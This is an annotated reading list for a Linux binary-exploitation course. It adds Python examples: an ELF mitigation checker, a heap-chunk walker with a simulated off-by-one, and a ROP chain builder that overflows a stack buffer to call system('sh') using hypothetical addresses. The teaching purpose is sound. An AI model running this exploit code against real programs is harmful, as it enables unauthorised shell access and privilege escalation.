Resources

A collection of links related to exploit.courses / the BFH course, mostly Linux-related. I may reference them in the course.

Particularly good ones are tagged Recommended.

Complete Exploitation Courses

Open Security Trainings

Avatao

  • Similar to exploit.courses (interactive shell), but more advanced
  • Paid
  • GDB Intro, Reversing Intro, Exploiting Intro

Binary Exploitation

  • 6 lectures
  • Intro to stack exploits, shellcode, ASLR, ret2libc and format strings

Fundamentals

GOT and PLT for pwning

  • Article
  • 2017
  • Describes the GOT, the PLT and RELRO from an exploitation angle
  • Recommended

What are the GOT and PLT? — Part 1

  • 2017
  • Good write-up

ELF Intro

Introduction to the ELF Format : The ELF Header (Part I)
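As an added example (written for this page, not taken from any of the linked articles), the following Python script parses the ELF header and program header table that the ELF intro above describes, and derives from them the three facts the GOT/PLT/RELRO write-ups above keep coming back to: whether the binary is a PIE, whether the stack is non-executable (PT_GNU_STACK without PF_X) and whether a RELRO segment exists (PT_GNU_RELRO). The field layouts are the standard ones from elf.h; the sample image is constructed inline (a header plus a program header table, no real code) and the entry point and offsets in it are arbitrary.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3
PT_LOAD, PT_INTERP = 1, 3
PT_GNU_STACK, PT_GNU_RELRO = 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

HDR_FIELDS = ("e_type", "e_machine", "e_version", "e_entry", "e_phoff", "e_shoff",
              "e_flags", "e_ehsize", "e_phentsize", "e_phnum", "e_shentsize",
              "e_shnum", "e_shstrndx")


def parse_elf_header(data):
    """Decode e_ident and the fixed fields of an ELF32/ELF64 header into a dict."""
    if len(data) < 16 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]   # EI_CLASS: 1 = 32-bit, 2 = 64-bit; EI_DATA: 1 = LSB, 2 = MSB
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # Only e_entry, e_phoff and e_shoff change width between ELF32 (I) and ELF64 (Q).
    fmt = endian + ("HHIQQQIHHHHHH" if ei_class == 2 else "HHIIIIIHHHHHH")
    size = 16 + struct.calcsize(fmt)
    if len(data) < size:
        raise ValueError("truncated ELF header")
    hdr = dict(zip(HDR_FIELDS, struct.unpack(fmt, data[16:size])))
    hdr["bits"] = 64 if ei_class == 2 else 32
    hdr["endian"] = endian
    if hdr["e_ehsize"] != size:
        raise ValueError("e_ehsize %d does not match EI_CLASS" % hdr["e_ehsize"])
    return hdr


def parse_program_headers(data, hdr):
    """Return (p_type, p_flags, p_vaddr, p_memsz) for every program header."""
    if hdr["bits"] == 64:   # Elf64_Phdr: type, flags, offset, vaddr, paddr, filesz, memsz, align
        fmt, pick = hdr["endian"] + "IIQQQQQQ", lambda f: (f[0], f[1], f[3], f[6])
    else:                   # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
        fmt, pick = hdr["endian"] + "IIIIIIII", lambda f: (f[0], f[6], f[2], f[5])
    ent = struct.calcsize(fmt)
    if hdr["e_phentsize"] != ent:
        raise ValueError("unexpected e_phentsize %d" % hdr["e_phentsize"])
    phdrs = []
    for i in range(hdr["e_phnum"]):
        off = hdr["e_phoff"] + i * ent
        entry = data[off:off + ent]
        if len(entry) != ent:
            raise ValueError("program header table runs past end of file")
        phdrs.append(pick(struct.unpack(fmt, entry)))
    return phdrs


def checksec(data):
    """Mitigation summary derived from the program headers alone."""
    hdr = parse_elf_header(data)
    phdrs = parse_program_headers(data, hdr)
    types = {p[0] for p in phdrs}
    stack = [p for p in phdrs if p[0] == PT_GNU_STACK]
    return {
        "bits": hdr["bits"],
        # ET_DYN plus a PT_INTERP is a PIE executable; ET_DYN alone may be a shared library.
        "pie": hdr["e_type"] == ET_DYN and PT_INTERP in types,
        # NX: the stack segment must exist and must not be executable. Linux treats a
        # missing PT_GNU_STACK as a request for an executable stack on x86.
        "nx": bool(stack) and not (stack[0][1] & PF_X),
        # PT_GNU_RELRO means at least partial RELRO; full RELRO additionally needs
        # DT_BIND_NOW / DF_BIND_NOW in the dynamic section, which is not parsed here.
        "relro": PT_GNU_RELRO in types,
    }


def build_sample(nx=True, relro=True, pie=True):
    """Constructed ELF64 x86-64 image for this example: header + program headers, no code."""
    phdrs = [(PT_LOAD, PF_R | PF_X, 0, 0x1000, 0x1000, 0x500, 0x500, 0x1000),
             (PT_INTERP, PF_R, 0x238, 0x238, 0x238, 0x1C, 0x1C, 1),
             (PT_GNU_STACK, PF_R | PF_W | (0 if nx else PF_X), 0, 0, 0, 0, 0, 16)]
    if relro:
        phdrs.append((PT_GNU_RELRO, PF_R, 0x2E00, 0x3E00, 0x3E00, 0x200, 0x200, 1))
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8     # ELF64, little endian, version 1
    hdr = struct.pack("<HHIQQQIHHHHHH", ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x1040,
                      64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)  # e_phoff = 64, e_phentsize = 56
    table = b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs)
    return ident + hdr + table


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(checksec(blob))
```

Run it with a path to summarise a real binary. Note the caveat in the code: "relro" here means the segment exists, i.e. at least partial RELRO; deciding full RELRO needs the dynamic section, and the difference matters for exploitation because only full RELRO makes the GOT read-only.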

Exploiting Cheat sheet

  • Picture
  • Cheatsheet

file descriptors

  • Picture
  • File Descriptors in Linux

JULIA'S DRAWINGS

  • Simple drawings about Linux fundamentals
  • Recommended

Linux Internals - The Art Of Symbol Resolution

  • Adjacent to exploitation rather than about it, but interesting nevertheless
  • Dynamic linking, GOT/PLT related

Linux Exploitation

Bypass ASLR+NX Part 1

  • 2018
  • Local exploit against a binary with ASLR and DEP (NX) enabled: a ROP chain calls strcpy() to write the string "sh" into .bss, then calls system() on it
  • Recommended
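Added example of the chain the Bypass ASLR+NX write-up above describes, written for this page rather than taken from it. It assumes a non-PIE x86-64 binary, so .plt and .bss sit at fixed addresses while libc and the stack are randomised; every address, gadget, the overflow offset and the two "binary images" below are hypothetical placeholders that would come from objdump/ROPgadget on a real target. strcpy() copies up to and including a NUL, so each piece of the target string must exist NUL-terminated somewhere in the non-randomised image; the planner picks the longest such pieces so the chain stays as short as the overflow allows.

```python
import struct
import sys

# Hypothetical non-PIE x86-64 layout (assumption for this example, not a real binary).
TEXT_BASE = 0x400000          # load address of the constructed image (fixed: no PIE)
STRCPY_PLT = 0x400510         # strcpy@plt
SYSTEM_PLT = 0x400520         # system@plt
POP_RDI_RET = 0x400783        # pop rdi ; ret
POP_RSI_R15_RET = 0x400781    # pop rsi ; pop r15 ; ret   (the usual __libc_csu_init gadget)
RET = 0x400416                # ret                        (stack-alignment pad)
BSS_DST = 0x601080            # writable, zero-initialised, fixed address in .bss
RET_OFFSET = 72               # bytes from the overflowed buffer to the saved return address

# Constructed images standing in for the bytes of a non-randomised binary.
IMAGE_WITH_SH = b"\x7fELF\x00\x00usage: %s\x00flush\x00"   # contains "sh\0" inside "flush\0"
IMAGE_SPLIT = b"\x7fELF\x00\x00pass\x00high\x00"           # only "s\0" and "h\0" are available


def p64(value):
    return struct.pack("<Q", value)


def plan_copies(image, image_base, string=b"sh"):
    """Split `string` into the fewest strcpy() calls: each piece must occur in the image
    followed by a NUL, because strcpy copies up to and including that terminator."""
    calls, pos = [], 0
    while pos < len(string):
        for n in range(len(string) - pos, 0, -1):       # longest piece first
            idx = image.find(string[pos:pos + n] + b"\x00")
            if idx >= 0:
                break
        else:
            raise LookupError("byte %#04x never occurs NUL-terminated in image" % string[pos])
        # strcpy appends a NUL after each piece; the next piece overwrites it, the last one
        # stays as the terminator, so the destination grows into the whole string.
        calls.append((BSS_DST + pos, image_base + idx))
        pos += n
    return calls


def build_payload(image, image_base, string=b"sh"):
    chain = b""
    for dst, src in plan_copies(image, image_base, string):
        chain += p64(POP_RDI_RET) + p64(dst)                 # rdi = destination in .bss
        chain += p64(POP_RSI_R15_RET) + p64(src) + p64(0)    # rsi = source bytes, r15 = junk
        chain += p64(STRCPY_PLT)                             # strcpy(dst, src), returns to next gadget
    chain += p64(RET)                                        # realign rsp before entering system()
    chain += p64(POP_RDI_RET) + p64(BSS_DST) + p64(SYSTEM_PLT)   # system("sh")
    return b"A" * RET_OFFSET + chain


if __name__ == "__main__":
    # Typical delivery: python3 rop.py | ./vuln
    sys.stdout.buffer.write(build_payload(IMAGE_WITH_SH, TEXT_BASE))
```

The 8-byte addresses contain NUL bytes, so the overflow has to reach the stack through read()/fgets()-style input rather than through strcpy() itself. The lone ret before system() is there because glibc's system() executes SSE instructions that fault when rsp is not 16-byte aligned; whether the pad is needed depends on the target's stack state, so try with and without.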

return-to-csu: A New Method to Bypass 64-bit Linux ASLR

  • 2018
  • ROP using the gadgets of __libc_csu_init in .text (despite the title, it does not bypass ASLR as such)

New bypass and protection techniques for ASLR on Linux

ROPping to Victory

  • 2018
  • ROP guide using radare2
  • Very simple buffer overflow that redirects execution to a predefined function

Binary Exploitation ELI5 – Part 1

  • Introduction to computers and the memory model
  • 2018
  • Simple intro

STACK BASED BUFFER OVERFLOW ON 64 BIT LINUX

  • Binary and ASCII intro
  • setuid, ASLR
  • Writes a BOF exploit for 64-bit Linux

Heap Exploitation

Exim Off-by-one RCE: Exploiting CVE-2018-6789 with Fully Mitigations Bypassing

From Heap to RIP

  • 2018
  • Attacking ptmalloc2 heap data structures

GlibC Malloc for Exploiters

  • Slides
  • Recommended
  • 2018
  • Heap introduction, exploiting view
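Added example, not from the linked slides or from the Exim write-up above: a small walker that reads a ptmalloc2 heap the way the GlibC Malloc slides lay it out. Every 64-bit chunk starts with prev_size and size, the low three bits of size are flags, the next chunk is found by adding the size, a chunk is in use only if the next chunk's PREV_INUSE bit is set, and a free chunk's size is mirrored into the next chunk's prev_size. The snapshot is constructed inline with a hypothetical heap base and fake fd/bk pointers; the off_by_one switch reproduces the effect of a single NUL-byte overflow of the kind the Exim write-up above exploits, clearing the low byte of the neighbouring chunk's size field.

```python
import struct

HEAP_BASE = 0x555555559000    # hypothetical heap start (assumption for this example)
MALLOC_ALIGN = 16             # 64-bit glibc: chunk sizes are multiples of 16
MIN_CHUNK_SIZE = 32           # smallest chunk on 64-bit (header + fd/bk)
PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 1, 2, 4   # low bits of the size field


def walk_chunks(region, base):
    """Follow the size fields through a contiguous region, as malloc itself does, and
    record anything that would fail glibc's own sanity checks."""
    chunks, off = [], 0
    while off + 16 <= len(region):
        prev_size, size = struct.unpack_from("<QQ", region, off)
        csize, flags = size & ~7, size & 7
        errors = []
        if csize < MIN_CHUNK_SIZE or csize % MALLOC_ALIGN:
            errors.append("bad size")
        elif off + csize > len(region):
            errors.append("size runs past end of region")
        chunks.append({"addr": base + off, "size": csize, "prev_size": prev_size,
                       "prev_inuse": bool(flags & PREV_INUSE),
                       "mmapped": bool(flags & IS_MMAPPED),
                       "non_main_arena": bool(flags & NON_MAIN_ARENA),
                       "in_use": None, "errors": errors})
        if errors:
            break             # the size cannot be trusted to locate the next chunk
        off += csize
    for prev, cur in zip(chunks, chunks[1:]):
        # A chunk is in use iff the PREV_INUSE bit of the *next* chunk is set ...
        prev["in_use"] = cur["prev_inuse"]
        # ... and a free chunk's size must be mirrored in the next chunk's prev_size.
        if not cur["prev_inuse"] and cur["prev_size"] != prev["size"]:
            cur["errors"].append("prev_size mismatch")
    return chunks                # the last chunk (top) keeps in_use = None


def build_region(off_by_one=False):
    """Constructed 0x200-byte heap snapshot: chunks A-D plus the top chunk, no real pointers."""
    region = bytearray(0x200)
    struct.pack_into("<QQ", region, 0x000, 0, 0x20 | PREV_INUSE)     # A: in use, 24 usable bytes
    struct.pack_into("<QQ", region, 0x020, 0, 0x110 | PREV_INUSE)    # B: in use
    struct.pack_into("<QQ", region, 0x130, 0, 0x90 | PREV_INUSE)     # C: free (fd/bk follow)
    struct.pack_into("<QQ", region, 0x140, 0x7FFFF7DD1B78, 0x7FFFF7DD1B78)  # fd/bk: hypothetical bin
    struct.pack_into("<QQ", region, 0x1C0, 0x90, 0x20)               # D: prev_size = C, PREV_INUSE clear
    struct.pack_into("<QQ", region, 0x1E0, 0, 0x20 | PREV_INUSE)     # top chunk: rest of the region
    if off_by_one:
        # A's 24 usable bytes run from 0x10 to 0x28 (B's prev_size slot is A's to use while
        # A is allocated). A 25th byte, e.g. strcpy's NUL, lands on the low byte of B's size
        # field and turns 0x111 into 0x100: B shrinks and A's PREV_INUSE bit disappears.
        region[0x10:0x29] = b"A" * 24 + b"\x00"
    return bytes(region)


if __name__ == "__main__":
    for label, snap in (("clean", build_region()), ("off-by-one", build_region(off_by_one=True))):
        print(label)
        for c in walk_chunks(snap, HEAP_BASE):
            print("  %#x size=%#x in_use=%s errors=%s" % (c["addr"], c["size"], c["in_use"], c["errors"]))
```

In the corrupted snapshot chunk A suddenly looks free to the allocator, B's prev_size no longer matches A, and following B's shrunken size lands in the middle of B's own data where no chunk header exists; those are exactly the inconsistencies that backward consolidation on free() would act on, which is what a heap viewer like the IDA plugin listed below makes visible.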

x86 exploitation - heap overflows

Heap Viewer

  • Tool for IDA
  • ptmalloc2 heap viewer

Automatic Heap Layout Manipulation for Exploitation

  • Paper
  • 2018
  • "SHRIKE discovers fragments of PHP code that interact with the interpreter’s heap in useful ways, such as making allocations and deallocations of particular sizes, or allocating objects containing sensitive data, such as pointers."

Linux Kernel Exploitation

Linux-Kernel-Exploit Stack Smashing

  • 2018-02-15
  • "Principle of kernel stack overflow and the user mode stack overflow are the same, we can use it to hijack control flow and privilege escalation in Ring 0."
  • Writeup

MMap Vulnerabilities – Linux Kernel

  • 2018
  • mmap() handler bugs in drivers

Linux Defense

Linux Kernel Defence Map

  • Overview of Linux Kernel defensive mechanisms

Fuzzing

The Art Of Fuzzing

  • 2018, René Freingruber
  • Complete, long introduction to fuzzing (slides, demos)
  • A lot of Windows fuzzing (WinAFL)
  • Recommended

fuzzing.io

  • Material by Richard Johnson (Cisco Talos)
  • Videos, presentations, tools
  • State-of-the-art and academic fuzzing material
  • Recommended

IEEE Hacking Without Humans

  • Papers related to DARPA CGC
  • 2018

Google Fuzzer Test Suite

  • Vulnerable programs with known bugs, for evaluating fuzzers
  • GitHub repo

Go Speed Trace

  • Slides, Richard Johnson (Cisco Talos)
  • About guided fuzzing, tracing, binary translation and hardware tracing
  • Focus on tracing closed-source applications

Fuzzing arbitrary functions in ELF binaries

  • 2018
  • Fuzzing individual functions of a binary with libFuzzer

VM Exploitation

Unboxing your virtualBox - Niklas Baumstark

  • VirtualBox exploitation
  • Video
  • 2018

A bunch of Red Pills: VMware Escapes

  • List of several VMware guest-to-host exploits
  • 2018
  • Good overview

Browser Exploitation

Building a 1-day Exploit for Google Chrome

  • Presentation, Code
  • 2018.03
  • JavaScript, Heap

How to kill a (Fire)fox

  • 2018, Pwn2Own bug
  • Heap exploit

CVE-2017-0236 analysis

  • Analysis of a UAF in Edge, using WinDbg
  • 2018

Attacking JavaScript Engines

  • 2016
  • A case study of JavaScriptCore and CVE-2016-4622

Root cause analysis of the latest Internet Explorer zero day – CVE-2018-8174

  • 2018
  • UAF
  • Short writeup

CTF

Pwntools Quick Reference Guide

  • Short overview of useful pwntools features
  • 2016

CTF Field Guide

  • "In these chapters, you’ll find everything you need to win your next CTF competition"

Embedded Systems Exploiting

Exploitation: ARM & Xtensa compared

  • 2018
  • "Stacks, overflows, gadgets, asm, and things"
  • Presentation

Exploitation on ARM-based Systems

  • 2018
  • Complete ARM exploitation intro

Exploitation of a Vanilla Buffer Overflow in the o2 HomeBox 6441 Router - A Step by Step Abuse Guide

  • Step by step
  • Simple exploit, plus code
  • Not very ARM-specific

Windows

BugID

  • Tool
  • Checks whether a crash is exploitable

Windows 10 mitigations improvements

  • Exploit mitigations in Windows 10
  • Lots of statistics, data, techniques
  • 2016
  • Recommended

Breaking CFI: Exploiting CVE-2015-5122 using COOP.

  • New technique to bypass some CFI implementations

Exploiting CVE-2018-1038 - Total Meltdown

  • Exploit for the broken Meltdown patch on Windows 7
  • Writing an easy kernel exploit

ANALYSIS OF A WIN32K NULL POINTER DEREFERENCE BY MATCHING THE MAY PATCH

  • 2018

A tale of two zero-days

  • Two zero-day vulnerabilities fused into one: a mysterious sample enables attackers to execute arbitrary code with the highest privileges on intended targets

Adobe, Me and a Double Free :: Analyzing the CVE-2018-4990 Zero-Day Exploit

  • 2018
  • Double Free

7-Zip: From Uninitialized Memory to Remote Code Execution

  • 2018
  • Bug analysis

Game hacking reinvented? – A cod exploit

Reverse engineering the Path of Exile game protocol - Part 1: Obtaining the plaintext

  • 2018
  • Reversing only, no exploitation

Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack

  • 2018
  • APT- and Microsoft-related

Shellcoding

How to write a (Linux x86) egg hunter shellcode

https://github.com/wetw0rk/Sickle

  • Tool
  • "Sickle is a shellcode development tool created to speed up the various steps needed to create functioning shellcode."

Debugging

C++ links: debugging: articles, documentation, software, and talks

  • List of resources
  • Very many links

Reverse Engineering

Reverse Engineering x64 for Beginners – Linux

  • 2018
  • Intro to reversing with GDB

Reverse Engineering With Radare2 – Part 3

  • 2018
  • Reversing with radare2

BOLO: Reverse Engineering — Part 1 (Basic Programming Concepts)

  • 2018
  • How basic functions look in assembly